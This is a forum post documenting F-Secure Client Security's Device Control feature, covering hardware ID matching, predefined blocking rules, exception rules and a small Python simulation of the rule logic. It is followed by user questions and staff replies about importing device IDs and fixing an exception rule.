Device Control Overview

Patrick Posts: 130
edited April 28 in Business Security

Device Control allows a network administrator to protect the network by disallowing the use of some hardware devices (USB sticks, CD-ROM drives, web cameras and so on).

When a prohibited device is plugged in, Device Control turns it off to prevent user access.

Device Control is provided with Client Security 9.3x.

 Installing Device Control

Device Control is installed by default with Client Security 9.30. The default rules do not disallow any devices. To use the function, Device Control has to be configured from the Policy Manager.

Device Control configuration

Device Control can be configured from the Policy Manager only. There is no local configuration user interface.


Device control options

Option: Device Control Enabled
  Values: Enabled, Disabled
  Description: Allows Device Control to be disabled. All rules and options are ignored if this option has the "Disabled" value.

Option: Notify Administrator
  Values: No Alerts, Informational, Warning, Security
  Description: Specifies the type of alert that is sent when a device is blocked. The administrator receives the corresponding type of alert. For example, if 'Warning' is selected, the administrator receives a warning alert. If 'No Alerts' is selected, the administrator does not receive any alerts for blocked devices.

Option: Hardware Devices
  Description: This table contains the rules for device control. The most specific rule is used to determine the access level for a device. Devices can be identified by (from specific to general):
    1. Device ID,
    2. Hardware ID,
    3. Compatible ID,
    4. Device Class GUID.
  All devices not listed in this table are allowed by default.


Hardware Devices table

Column: Active
  Values: Yes, No
  Description: This flag indicates that the rule is in use.

Column: Display Name
  Description: The rule name that is shown to administrators. This name should help administrators organize rules.

Column: Hardware ID
  Description: The string that identifies the device (Device ID, Hardware ID, Compatible ID or Class GUID).

Column: Access Level
  Values: Full access, Blocked
  Description: The access level for the device.

 

How Device Control blocks devices

Hardware Identifiers

In Windows, every device has a few sets of properties that can be used to identify the device or the class of device.
In the table below the properties are ordered by specificity, from most specific to most general:

Property: Device ID
  Description: A device has only one Device ID, which is the most specific ID for a device.

Property: Hardware IDs
  Description: A device can have multiple Hardware IDs. They are also ordered by specificity.

Property: Compatible IDs
  Description: A list of general IDs for all devices of the same kind.

Property: Class
  Description: A single GUID of the device interface class. Every device has one and only one class. This is a registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class where device information is stored. There is a list of common classes, but some devices generate a unique class.

 

The algorithm

  1. Device Control subscribes to the system notification about hardware configuration changes.
  2. When the configuration changes, Device Control enumerates all devices.
  3. For every device, the device identifiers are checked starting from the Device ID down to the Class GUID.
  4. If a matching rule is found, Device Control checks the Access Level from the rule.
  5. If the rule has Full access and the device is blocked, Device Control removes the block (enables the device).
  6. If the rule has the Blocked access level and the device is not blocked, Device Control blocks (disables) the device.
  7. If the access level matches the current state of the device, no action is performed.

Alerts

  • When a device is blocked for the first time, a flyer notification is shown to the current user.
  • The Policy Manager administrator gets an alert every time a device is blocked.


Block access using predefined rules

Device Control is provided with a set of common rules:

  • USB Mass Storage Devices
  • Wireless devices
    NOTE: Some USB Wi-Fi adapters do not use the USB\Class_E0 hardware ID. To control such devices, one should create a custom rule.
  • DVD/CD-ROM drives
  • Windows CE ActiveSync devices
  • Floppy drives
  • Modems
  • COM & LPT ports
    NOTE: This rule controls not the devices connected to the COM or LPT ports but the ports themselves.
  • Printers
  • Smart Card Readers
  • Imaging Devices (cameras and scanners)
  • IEEE 1394 Host Bus Controllers
  • IrDA Devices
  • Bluetooth Devices

To prevent users from using devices, the administrator should select the "Blocked" access level for the desired rule.

 

Adding exceptions (grant access to the specific device)

It is possible to define rules that allow the use of a specific device while all other devices of the same class are blocked:

  1. Get the Hardware ID of the device that should be allowed. The Hardware ID has to be more specific than the ID used to block the device.
  2. Add a new rule in the Hardware Devices table with that ID.
  3. Set the "Full access" access level for the newly created rule.
  4. Set Active to "Yes" for the newly created rule.
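As an added example (not F-Secure's code), the rule matching from "The algorithm" section and the exception steps above, in Python: the most specific active rule wins, so a Full access rule on a hardware ID overrides a Blocked rule on the generic class ID. The rule and device values are constructed, and case-insensitive ID comparison is an assumption.

```python
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class Rule:                  # one row of the Hardware Devices table
    display_name: str
    hardware_id: str         # Device ID, Hardware ID, Compatible ID or Class GUID
    access_level: str        # "Full access" or "Blocked"
    active: bool = True

@dataclass
class Device:                # one row of the Device Control statistics
    device_id: str
    hardware_ids: List[str] = field(default_factory=list)    # most specific first
    compatible_ids: List[str] = field(default_factory=list)
    class_guid: str = ""
    blocked: bool = False    # current state reported by Windows

def identifiers(dev: Device) -> List[str]:
    """IDs in the order Device Control checks them (step 3): Device ID down to Class GUID."""
    return [dev.device_id, *dev.hardware_ids, *dev.compatible_ids, dev.class_guid]

def match_rule(dev: Device, rules: List[Rule]) -> Optional[Rule]:
    """Most specific active rule for the device, or None (not listed: allowed by default).
    Assumption: IDs are compared case-insensitively, as Windows PnP IDs are."""
    active = {r.hardware_id.casefold(): r for r in rules if r.active}
    for ident in identifiers(dev):
        if ident and ident.casefold() in active:
            return active[ident.casefold()]
    return None

def decide_action(dev: Device, rules: List[Rule]) -> str:
    """Steps 4-7: what Device Control does to the device: 'enable', 'disable' or 'none'."""
    rule = match_rule(dev, rules)
    if rule is None:
        return "none"                 # no rule: the device is left as it is
    if rule.access_level == "Full access" and dev.blocked:
        return "enable"
    if rule.access_level == "Blocked" and not dev.blocked:
        return "disable"
    return "none"                     # access level already matches the device state

# Constructed sample: block all USB mass-storage devices by a generic compatible ID, then allow
# one stick by its more specific hardware ID (vendor/product IDs and the class GUID are made up).
RULES = [
    Rule("USB Mass Storage Devices", "USB\\Class_08", "Blocked"),
    Rule("Allowed company stick", "USB\\VID_1234&PID_5678", "Full access"),
]
STORAGE_IDS = ["USB\\Class_08&SubClass_06&Prot_50", "USB\\Class_08"]
GUID = "{00000000-0000-0000-0000-000000000000}"   # placeholder class GUID
ALLOWED = Device("USB\\VID_1234&PID_5678\\SERIAL0001", ["USB\\VID_1234&PID_5678&REV_0100", "USB\\VID_1234&PID_5678"], STORAGE_IDS, GUID, blocked=True)
OTHER = Device("USB\\VID_AAAA&PID_BBBB\\SERIAL0002", ["USB\\VID_AAAA&PID_BBBB&REV_0100", "USB\\VID_AAAA&PID_BBBB"], STORAGE_IDS, GUID)
```

Run `decide_action(ALLOWED, RULES)` and `decide_action(OTHER, RULES)` to see the exception stick re-enabled and the unknown stick disabled; an exception rule whose ID is less specific than the blocking rule, or whose Active flag is "No", never wins.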

Getting Hardware ID for a device

There are several ways to get the Hardware IDs of a device to use in rules:

  1. Using Device Control statistics
  2. Using Windows Device Manager

Getting Hardware ID from statistics

  1. Open Device Control statistics in the Policy Manager.
  2. Find the device of interest in the Devices table that should be used in rules.
  3. Use one of the values from the Hardware IDs, Compatible IDs or Device Class columns.

Getting Hardware ID from Windows Device Manager

  1. From Control Panel, open Device Manager.
  2. Select the device of interest in the tree.
  3. Open the properties dialog.
  4. Go to the Details tab.
  5. The following properties contain IDs:
    1. Hardware IDs
    2. Compatible IDs
    3. Device class guid

         

Device Control statistics

Device Control reports all devices installed on the PC using PM statistics. Device Control Statistics contains the following table:

Column: Device ID
  Description: The Device ID.
Column: Device Name
  Description: The name of the device reported by the system.
Column: Hardware IDs
  Description: The comma-separated list of Hardware IDs.
Column: Compatible IDs
  Description: The comma-separated list of Compatible IDs.
Column: Device class
  Description: The Device class GUID.
Column: State
  Description: The state of the device reported by Windows:
    • Enabled - the device can be used
    • Disabled - the device cannot be used
    • Unknown - the system cannot get the device state. Probably there is some problem with the device driver.
Column: Rule
  Description: If the device was disabled by Device Control, this field contains the Hardware ID from the rule that affected it.

        Comments

        • tle Posts: 16

          Is F-Secure going to provide some kind of tool for adding (import) multiple DeviceIDs to PM?

        • Patrick Posts: 130

          Hi tle,

           

          I will check out on this with R&D and come back to you afterwards.

        • Patrick Posts: 130

          Hi tle,

           

          R&D took this feature request to their backlog. We are currently collecting feedback on Device Control and we will decide later on, which feature we will implement and when we are going to implement those.

           

          Therefore I can't tell you if and when we will implement your request.

        • johan65 Posts: 20

          Hi dear Patric!

           

           

          I agree. It would be very convenient if, for example, there is a monitor tool within the client which has the purpose to read all devices, have it reported to Policy Manager and use a similar management mechanism as we use for reported applications from clients.

        • Patrick Posts: 130

          Hi Johan,

           

          we basically have the functionality to view the Hardware IDs from the client using Device Control Statistics:

           

          Getting Hardware ID from statistics

          1. Open Device Control statistics in the Policy Manager.
          2. Find the device of interest in the Devices table that should be used in rules.
          3. Use one of the values from the Hardware IDs, Compatible IDs or Device Class columns.

          But as mentioned before we do not offer a solution to directly create rules based on those in the statistics. I will inform R&D that there is more demand for such feature.

           

          Thanks for your reply!

        • tle Posts: 16

          Any progress on the tool to get multiple DeviceIDs imported for example from a .csv file?

           

           

        • keiooz Posts: 41

          Hi there.

           

          Do we have any update on this?

        • tle Posts: 16

          So, is F-Secure going to make any kind of tool for importing?!

        • I've installed F-Secure Policy Manager 10.01 and F-Secure Client Security 9.32 for the clients. But I'm not finding any option for Device Control. Can you please tell me how to configure my device control from the policy manager?

           

          Julker

        • Patrick Posts: 130

          Hi Julker,

           

          the device control settings are only available in "advanced mode" view of Policy Manager Console. Once switched to advanced mode you'll find "F-Secure Device Control" among the different modules.

        • tle Posts: 16

          Is there still no tool for adding multiple device-ids to PM?

        • kallstrom Posts: 25

          @Patrick wrote:
            Adding exceptions (grant access to the specific device)

          It is possible to define rules that allow the use of a specific device while all other devices of the same class are blocked:

          1. Get the Hardware ID of the device that should be allowed. The Hardware ID has to be more specific than the ID used to block the device.
          2. Add a new rule in the Hardware Devices table with that ID.
          3. Set the "Full access" access level for the newly created rule.
          4. Set Active to "Yes" for the newly created rule.

           

          Hi

          Can U take a look at my settings and tell me what is wrong, that my exception doesn't work?

           

          FDC

           

          DataTravel3 has Full access but it's blocked by the first rule. I want to block all the usb mass devices except those I will choose not to.

          thx

        • Vad Posts: 1,050 F-Secure Employee

          Hello kallstrom,

           

          Please, try to use "Hardware Ids" property value from Device Manager.

          Example: USB\VID_0457&PID0151

          or: USB\VID_0457&PID0151&REV_0100

           

          Best regards,

          Vad

        • kallstrom Posts: 25

          Hello Vad,

           

          thx, I used the IDs U have mentioned and it's ok now.

          In the F-Secure console it's called Device ID (first column).

        • kallstrom Posts: 25

          Is it possible to copy the whole list of devices from one Policy Manager to another?

        • Vad Posts: 1,050 F-Secure Employee

          Unfortunately, there is no such functionality in Policy Manager.

        • kallstrom Posts: 25

          Do U plan to create a tool or an import/export option for this module? My office has 5 branches, each has a separate PMC. So I need to enter 1000 devices in each console :/

        • Vad Posts: 1,050 F-Secure Employee

          Sorry for the incorrect information. The feature is implemented already in PM 11 (or even earlier). You need to select the rows (or the whole table) and by right-clicking the mouse you'll get the possibility to "Export table to CSV" and "Import table from CSV".

           

          Best regards,

          Vad

        This discussion has been closed.